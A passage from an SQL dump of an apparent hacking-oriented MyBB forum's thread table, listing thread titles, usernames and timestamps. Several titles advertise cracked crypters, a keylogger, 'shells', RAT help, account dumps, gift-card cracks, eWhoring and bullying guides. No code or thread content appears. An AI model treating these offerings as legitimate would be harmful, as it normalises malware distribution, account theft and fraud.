`attachmentcount`, `deletetime`) VALUES ('1114', '49', 'AWARDS SUGGETION', '0', '0', '0', '257', 'XxTREYZxX', '1351316244', '6478', '1351337131', 'iTzIpod', '82', '11', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1115', '49', 'Update the logo....', '0', '0', '0', '222', 'Exposé', '1351316875', '6479', '1351462624', 'Timmy', '5', '97', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1116', '4', 'LOLLIPOP IN THE HOUSE :O', '0', '0', '0', '295', 'Lollipop123', '1351321647', '6481', '1351387123', 't3h jok3r', '1', '24', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1118', '9', '? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '0', '0', '53', 'sirchamp', '1351362966', '6503', '1352769433', 'iTzIpod', '82', '651', '21', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1119', '82', 'Simple Clickbank - Step By Step Tutorial [ The Ultimate Clickbank System ]', '0', '0', '0', '228', 'VirtualLegend', '1351368123', '6508', '1351387800', 'Apathy', '2', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1121', '20', 'JodMod Crypter 1/35 cracked', '0', '0', '0', '7', 'Romdu62', '1351390969', '6524', '1351738386', 'NXK', '61', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1122', '25', '[TuT]How To Speed Up Your Computer', '0', '0', '0', '7', 'Romdu62', '1351391118', '6526', '1351536738', 'XxTREYZxX', '257', '17', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1123', '44', 'eWhoring Tactics; How to Change Writing on Pics', '0', '0', '0', '5', 'Timmy', '1351391351', '6527', '1351430954', 'R?????zo?', '62', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1128', '67', '[TuT] Creating a PM system', '0', '0', '0', '9', 'p420', '1351465127', '6562', '1351538278', 'XxTREYZxX', '257', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1124', '42', '22-Year-Old Girl Sells Her Virginity Online', '0', '0', '0', '264', 'D?ea', '1351440150', '6541', '1351725473', 'XxTREYZxX', '257', '20', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1125', '42', 'Death by Monster energy drink', '0', '0', '0', '264', 'D?ea', '1351440285', '6542', '1351727773', 'NXK', '61', '22', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1126', '42', 'Facebook spent $715M on Instagram, $87M on other acquisitions this year', '0', '0', '0', '264', 'D?ea', '1351440704', '6543', '1351531211', 'Mac Miller', '302', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1127', '42', 'Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '0', '0', '264', 'D?ea', '1351440836', '6544', '1351653099', 'Timmy', '5', '23', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1129', '65', 'How do you watch your digital content', '0', '0', '0', '262', 'RAND0M1ZER', '1351476233', '6568', '1351476233', 'RAND0M1ZER', '262', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1130', '83', '[Videos] Dancing with girls [Text tips included]', '0', '0', '0', '4', 'Triple H', '1351480386', '6571', '1351481778', 'Triple H', '4', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1131', '83', '[Guide] Bagging whores in High School', '0', '0', '0', '4', 'Triple H', '1351481714', '6575', '1351481714', 'Triple H', '4', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1132', '83', '10 Rules for Dealing with Police', '0', '0', '0', '7', 'Romdu62', '1351481959', '6578', '1351481959', 'Romdu62', '7', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1133', '83', '[Tutorial] Cheating on tests', '0', '0', '0', '7', 'Romdu62', '1351482382', '6579', '1351749886', 'Timmy', '5', '18', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1134', '35', 'My new pet', '0', '0', '0', '67', 'HoverCatz', '1351506665', '6584', '1351539730', 'iTzIpod', '82', '8', '1', '', '0', '0', '0', '', '1', '0', '1', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1135', '4', 'Most Dope General in the building!', '0', '0', '0', '302', 'Mac Miller', '1351529743', '6593', '1351599788', 'Mac Miller', '302', '15', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1137', '59', '[Ebook]Make $50+ a day usuing AdSense', '0', '0', '0', '302', 'Mac Miller', '1351541469', '6635', '1351541469', 'Mac Miller', '302', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1136', '47', 'C++ Tutorial Givaway', '0', '0', '0', '302', 'Mac Miller', '1351530887', '6597', '1351696689', 'VirtualLegend', '228', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1138', '42', 'Hurricane Sandy live updates and discussion', '0', '0', '0', '8', 'spacefish36', '1351552988', '6644', '1351634192', 'VirtualLegend', '228', '19', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1139', '83', '[tutorial] How to bully and get away in US', '0', '0', '0', '4', 'Triple H', '1351562475', '6657', '1351749971', 'Timmy', '5', '14', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1143', '24', 'NEED HELP', '0', '0', '0', '257', 'XxTREYZxX', '1351643773', '6705', '1351743912', 'XxTREYZxX', '257', '20', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1140', '8', 'Who likes OFWGKTA?', '0', '0', '0', '302', 'Mac Miller', '1351599108', '6670', '1351698117', 'Mac Miller', '302', '26', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1141', '4', 'Hi, I`m CommandoModz', '0', '0', '0', '306', 'CommandoModz', '1351613410', '6675', '1351686628', 'Mac Miller', '302', '11', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1142', '24', 'Fuck you Internet Explorer', '0', '0', '0', '1', 't3h jok3r', '1351620728', '6684', '1351735798', 't3h jok3r', '1', '14', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1144', '11', 'What can you do with?', '0', '0', '0', '306', 'CommandoModz', '1351648215', '6706', '1352625357', 'sirchamp', '53', '30', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1145', '42', 'Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '0', '0', '5', 'Timmy', '1351651713', '6709', '1352427111', 't3h jok3r', '1', '42', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1146', '72', 'DO NOT BUY NFS Most Wanted', '0', '0', '0', '5', 'Timmy', '1351652654', '6710', '1351749562', 'Timmy', '5', '21', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1147', '9', 'BRAIN FREEZE - Moneymaking Method', '0', '0', '0', '7', 'Romdu62', '1351656958', '6716', '1351684291', 'VirtualLegend', '228', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1148', '30', '[Crack] Limitless Logger 6.7 !!', '0', '0', '0', '5', 'Timmy', '1351657206', '6718', '1351985446', 'NXK', '61', '18', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1149', '20', '[AutoIt] [JY]-R00t Crypter| FUD[USB Spread & sRootKite]ByPass SandBoxie & VM\'s', '0', '0', '0', '5', 'Timmy', '1351657530', '6722', '1352018424', 'luc1f3r.n008', '316', '19', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1150', '18', 'Facebook Creator', '0', '0', '0', '5', 'Timmy', '1351657787', '6726', '1351657845', 'XxTREYZxX', '257', '4', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1151', '18', 'Instaflow [Instagram bot] [Gold Version]', '0', '0', '0', '9', 'p420', '1351657882', '6729', '1351657882', 'p420', '9', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1152', '21', 'Private Hard Hitting Shells', '0', '0', '0', '9', 'p420', '1351657971', '6730', '1351715286', 'iTzIpod', '82', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1155', '3', 'Happy Halloween', '0', '0', '0', '1', 't3h jok3r', '1351660263', '6738', '1351823062', 't3h jok3r', '1', '61', '17', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1153', '64', 'Watch Prison Break full online for free', '0', '0', '0', '9', 'p420', '1351658400', '6733', '1351749785', 'Timmy', '5', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1154', '43', 'Iphone 5 serials', '0', '0', '0', '9', 'p420', '1351658625', '6734', '1351808927', 'NXK', '61', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1156', '64', 'Walking dead', '0', '0', '0', '257', 'XxTREYZxX', '1351663300', '6743', '1351750256', 'Triple H', '4', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1157', '74', '[1.4.X] Minecraft Nodus Force Op [Direct Link][Not Patched 10/30/12]', '0', '0', '0', '257', 'XxTREYZxX', '1351663724', '6744', '1351663724', 'XxTREYZxX', '257', '3', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1158', '74', 'A few minecraft accounts that might work', '0', '0', '0', '257', 'XxTREYZxX', '1351664983', '6745', '1351802487', 'iTzIpod', '82', '15', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1159', '74', 'More minecraft acc that might work', '0', '0', '0', '257', 'XxTREYZxX', '1351665158', '6746', '1351884211', 'iTzIpod', '82', '20', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1163', '35', 'You Like it ? [ Rate My Graphic ]', '0', '0', '0', '228', 'VirtualLegend', '1351700732', '6768', '1351769682', 'iTzIpod', '82', '16', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1160', '9', '? Ebay Gold Digger System ? [ Highly Recommended ]', '0', '0', '0', '228', 'VirtualLegend', '1351692573', '6757', '1351692573', 'VirtualLegend', '228', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1161', '65', '????? YIFY Torrents ?????', '0', '0', '0', '228', 'VirtualLegend', '1351693111', '6758', '1351693111', 'VirtualLegend', '228', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1162', '12', 'Rank your YouTube videos to Number #1', '0', '0', '0', '228', 'VirtualLegend', '1351696998', '6764', '1351696998', 'VirtualLegend', '228', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1164', '11', 'RAT Help', '0', '0', '0', '160', 'Jacob', '1351737883', '6811', '1352227755', 'Jacob', '160', '25', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1165', '7', 'I m Back on LH:)', '0', '0', '0', '54', 'Sin Cara', '1351744218', '6820', '1352195571', 'Romdu62', '7', '55', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1169', '3', 'Computing Tab Forum Suggestions', '0', '0', '0', '1', 't3h jok3r', '1351750138', '6836', '1352536047', 'Romdu62', '7', '25', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1177', '43', 'Free itunes/app store gift cards crack', '0', '0', '0', '5', 'Timmy', '1351835023', '6905', '1352196031', 't3h jok3r', '1', '19', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1166', '46', '[Guide] Reporting Phishing Pages', '0', '0', '0', '1', 't3h jok3r', '1351748936', '6824', '1351917769', 't3h jok3r', '1', '10', '3', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1167', '75', 'Batman Arkham City Cheats', '0', '0', '0', '5', 'Timmy', '1351749505', '6826', '1352530472', 'Timmy', '5', '5', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1168', '73', 'Temple Run or Subway Surfer?', '0', '0', '0', '5', 'Timmy', '1351749623', '6828', '1352230724', 'VirtualLegend', '228', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1170', '63', 'Need a sig', '0', '0', '0', '4', 'Triple H', '1351750388', '6839', 